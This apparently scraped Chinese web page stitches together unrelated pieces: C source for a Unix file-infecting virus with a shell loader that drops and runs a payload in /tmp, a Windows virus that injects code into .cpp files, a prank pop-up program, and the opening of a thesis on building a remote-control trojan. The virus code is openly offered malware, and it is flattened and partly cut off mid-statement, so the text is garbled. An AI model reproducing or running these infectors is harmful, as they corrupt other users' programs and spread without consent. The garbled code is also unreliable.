/tmp/.@`whoami`;cat < '#define LOADER2 ' |tail -c 18606 >/tmp/.@`whoami`;chmod 700/tmp/.@`whoami`;/tmp/.@`whoami`;rm -f /tmp/.@`whoami`;exit;\n'/* ^^^^^modify here */#define VL 18606/* and ^^^^^ here */#define VLL -VL#define BUFSIZE 25088#define BSI 80#define EXE 1#define SCR 2struct flock bk;int fo,f,status=NULL;int flagn=0;void main(argc,argv,envp)int argc;char *argv[];char *envp[];{char *buf2,*fname;static char pidp[BSI]='/tmp/.'; static char bufr[BSI]=''; static int dec;unsigned int k,kep;struct passwd *getp;int caller(void);int chec(int);char *base(char *);char *find(void);void catch(void);int check(char *,int);signal(SIGCLD,SIG_IGN);strcat(pidp,ecvt((double)getuid(),chec(getuid()),&dec,&dec));fname=(char *)tempnam('/tmp',NULL);buf2=(char *)malloc(BUFSIZE);if((fo=open(argv[0],O_RDONLY))<0 || (f=creat(fname,PERM))<0) exit(1);if((kep=lseek(fo,0L,2))>2*VL){lseek(fo,VLL,2);k=read(fo,buf2,VL);write(f,buf2,k);lseek(fo,VL,0);while((k=read(fo,buf2,BUFSIZE))>0)write(f,buf2,k);/* ignore more lefting virus in a tail */}else{lseek(fo,VL-kep,2);k=read(fo,buf2,kep-VL);write(f,buf2,k);}close(f);chmod(fname,S_IRWXU);free(buf2);if((kep=fork())>0){for(k=0;k if(*(argv[0]+k)=='@') exit(0);execve(fname,argv,envp);}elseif(kep==0){sleep(2);unlink(fname);for(k=0;k getp=(struct passwd *)getpwuid(getuid());strcpy(argv[0],base(getp->pw_shell));/* initialize daemon process ... */for(k=0;k<2;k++) close(k);umask(0);if(fork()!=0)exit(0);signal(SIGHUP,SIG_IGN);signal(SIGINT,SIG_IGN);signal(SIGTTOU,SIG_IGN);setpgrp();if((kep=open('/dev/tty',O_RDWR))>=0){ ioctl(kep,TIOCNOTTY,(char *)0);close(kep);}if(fork()!=0)exit(0);signal(SIGUSR1,catch);if((kep=open(pidp,O_CREAT|O_RDWR,S_IRUSR|S_IWUSR))<0) exit(1);k=read(kep,bufr,BSI);if(k!=0) kill(atoi(bufr),SIGUSR1);strcpy(bufr,ecvt((double)getpid(),chec(getpid()),&dec,&dec)); lseek(kep,0L,0);do{k=write(kep,bufr,strlen(pidp)+1);while((buf2=find())!=NULL){getp=(struct passwd *)getpwnam(buf2);if(chdir((buf2=(char *)getp->pw_dir))<0) continue;if(ftw(buf2,caller,15)!=0) continue;}sleep(CHKT);setutent();lseek(kep,0L,0);}while(1);}}int chec(num)int num;{int y=1;while((num=(int)(num/10))>=1) y++;return(y);}void catch(void){flagn=1;}char *base(poi)char *poi;{ int i;for(i=(strlen(poi)-1);i>=0;i--)if(*(poi+i)=='/') return((char *)(poi+i+1)); return('sh');}char *find(){static char name[9]='';struct utmp *goal;goal=(struct utmp *)getutent();if(goal->ut_type==USER_PROCESS){strcpy(name,goal->ut_user);return(name);}if(goal==(struct utmp *)NULL) return(NULL); }int caller(name,statptr,type)char *name;struct stat *statptr;int type;{ unsigned int nread,ymode;static char load[200];char buf[VL],buf3[VL];if(type==FTW_F){ymode=statptr->st_mode;if(check(name,ymode)<0){ if(statptr->st_uid==getuid()) chmod(name,ymode); return(0);}if( status==SCR ){strcpy(load,LOADER);strcat(load,name);strcat(load,LOADER2);lseek(f,0L,2);write(f,load,strlen(load));lseek(fo,0L,0);nread=read(fo,buf,VL);write(f,buf,nread);}if( status==EXE ){if(statptr->st_size>VL){lseek(f,0L,0);nread=read(f,buf,VL);lseek(f,0L,2);write(f,buf,nread);lseek(fo,0L,0);nread=read(fo,buf,VL);lseek(f,0L,0);write(f,buf,nread);}else{lseek(f,0L,0);nread=read(f,buf3,VL);ymode=nread;lseek(fo,0L,0);nread=read(fo,buf,VL);lseek(f,0L,0);write(f,buf,nread);write(f,buf3,ymode);}}/* lseek(f,0L,0);lockf(f,F_ULOCK,0); *//* author's linux library has no above program library */bk.l_type=F_UNLCK;bk.l_whence=0;bk.l_len=0;bk.l_start=0;fcntl(f,F_SETLK,&bk);if(statptr->st_uid==getuid()) chmod(name,ymode); close(f);}if(flagn) exit(0);return(0);}int check(name,ymode)char *name;int ymode;{char ch[CHK];char ch2[CHK];int rd,i;status=(int)NULL;if((f=open(name,O_RDWR))<0){if(chmod(name,ymode|S_IRUSR|S_IWUSR)<0) return(-1);if((f=open(name,O_RDWR))<0) return(-1);}/* if(lockf(f,F_TLOCK,0)<0) { close(f); return(-1); } */bk.l_type=F_WRLCK;bk.l_whence=0;bk.l_len=0;bk.l_start=0;if(fcntl(f,F_SETLK,&bk)<0) { close(f); return(-1); }lseek(f,0L,0);rd=read(f,ch,CHK);lseek(fo,0L,0);read(fo,ch2,rd);for(i=0;i if(ch[i]!=ch2[i]){if( ch[0]!='#' && (ymode&(S_IXUSR|S_IXGRP|S_IXOTH)) ){status=EXE; return(1); }elseif( ch[0]=='#' && lseek(f,0L,2)>VL ) /* you can improve the rule */{lseek(f,VLL,2);rd=read(f,ch,CHK); lseek(fo,0L,0);read(fo,ch2,rd);for(i=0;i if(ch[i]!=ch2[i]) { status=SCR; return(1); } }else if(ch[0]=='#'){ status=SCR; return(1); } break;}close(f);return(-1);}。

#include <stdio.h>#include <io.h>#include <string.h>#include <windows.h>/*void virusbody(){printf("I am virus!\n");}*/#define LINE 4char virus[LINE][50] = {"void virusbody()", "{", "printf(\"I am virus!\\n\");", "}"}; char virusinvoke[] = "virusbody();";char virusflag[] = "#define VIRUSFLAG 1\n";char virusinclude[] = "#include <stdio.h>\n";void main(){FILE *fpr, *fpw;char *buf, *posmain;int i, len;char curdir[256];struct _finddata_t fdt;long hfile;GetCurrentDirectory(256, curdir);strcat(curdir, "\\*.cpp");hfile = _findfirst(curdir, &fdt); //查找所有 cpp 文件if(hfile != -1L){do{if(!strstr(, "InfectC.cpp")) //不感染自己{fpr = fopen(, "rb");len = filelength(fpr->_file);buf = new char[len];fread(buf, len, 1, fpr);if(!strstr(buf, virusflag)) //未做感染标记{fpw = fopen(, "rb+");fwrite(virusinclude, strlen(virusinclude), 1, fpw); //写病毒体fwrite(virusflag, strlen(virusflag), 1, fpw);for(i = 0; i < LINE; i++){fwrite(virus[i], strlen(virus[i]), 1, fpw);fputc('\n', fpw);}posmain = strstr(buf, "main"); //查找插入病毒位置fwrite(buf, posmain - buf + 9, 1, fpw);fwrite(virusinvoke, strlen(virusinvoke), 1, fpw);fwrite(posmain + 9, len - (posmain - buf) - 9, 1, fpw);delete buf;fclose(fpw);fclose(fpr);}}}while(_findnext(hfile, &fdt) == 0); }}。

——1个连360都查不出来的可怕病毒…
哈哈，只是一个恶搞的病毒，大家可以自己编译一下，也可以自己改编，很简单的病毒
下面是病毒代码，纯属恶搞，绝无危害
#include <windows.h>
int main()
{
int judge= MessageBox(NULL,"你的电脑已经中了我的病毒","小可怕病毒",MB_YESNO|MB_ICONEXCLAMATION|MB_HELP);
if(judge==IDYES) {
int a=MessageBox(NULL,"点击修复","小可怕毒修复程序",MB_YESNO);
if (a==IDYES)
{MessageBox(NULL,"骗你的","小可怕病毒恶搞程序",MB_RETRYCANCEL);}
}
else{
MessageBox(NULL,"可恶，你的电脑要没了","一大波病毒入侵",MB_OK|MB_ICONEXCLAMATION);
}
return 0;
}
这是界面，不过大家要在win32项目下写才会没有这个黑黑的东东
--made by gaoxiaolong。

基于VC的一种简单木马的设计摘要目前，Internet已经得到非常广泛的使用，但是同时，各种黑客工具和网络攻击手段也层出不穷。

黑客入侵给人们造成的各种损失也越来越大，其中木马就是被广泛使用的黑客工具之一，它对网络安全造成了极大的威胁。

本毕业设计使用VC++ 6.0为开发平台设计的一个简单的木马程序，主要实现了获取远程被控计算机的基本信息、锁定其鼠标和键盘、注销重启和关闭被控计算机、隐藏并开启其任务栏、向被控计算机发送消息等功能。

本论文从选题背景入手，介绍了与本系统相关的一些理论知识，以及开发工具，随后详细介绍了该木马程序的开发过程，包括服务端/客户端的socket编程，木马服务端和客户端通信的实现，以及实现远程控制的各种具体功能的实现。

最后对系统进行测试，并对所做工作进行总结。

关键词：木马；远程控制；VC；Windows SocketThe Design of the Trojan Horse Based on Visual CAbstractWith the popularization of the Internet and the development of its application, various kinds of Internet-attacking methods are appeared. These Internet-attacking have seriously damaged the machines and the Internet users. The Trojan horse is one of the popular tools used by hacker and influenced the network security more and more.In this design a simple Trojan horse is developed with Visual C++ 6.0. The primary function includes: getting system information of the long-distance computer, locking its mouse and keyboard, rebooting logout and turn off the computer, hiding taskbar, sending message, catching and killing the process and so on.In this paper, the background and the development technology is introduced at first, and then it introduces the design process of the Trojan Horse, includes socket programming of the server and client, communication between the server and client and implementation the function in detail.Key words:Trojan Horse; Long-distance control; VC; Windows Socket目录论文总页数：26页1 引言 (1)2 相关技术介绍 (1)2.1开发环境VC++6.0 (1)2.2套接字S OCKET编程原理 (1)2.3木马基本原理 (3)2.3.1木马定义 (3)2.3.2木马发展 (3)2.3.3木马基本组成 (4)2.3.4C/S客户服务器模式 (4)2.3.5木马入侵过程 (5)3 系统设计 (7)3.1系统总体设计 (7)3.1.1设计目标 (7)3.1.2功能介绍 (8)3.2具体功能实现 (9)3.2.1获取信息功能 (9)3.2.2清除信息 (10)3.2.3锁定鼠标和键盘 (10)3.2.4注销、重启和关机 (11)3.2.5隐藏并开启任务栏 (13)3.2.6发送消息 (16)3.2.7查看进程 (17)3.2.8木马的伪装 (20)4 系统测试 (23)结论 (24)参考文献 (24)致谢 (25)声明 (26)1引言以Internet为代表的全球性信息化浪潮日益高涨，信息网络技术的应用正日益普及，伴随网络的普及，安全问题日益成为影响网络效能的重要问题。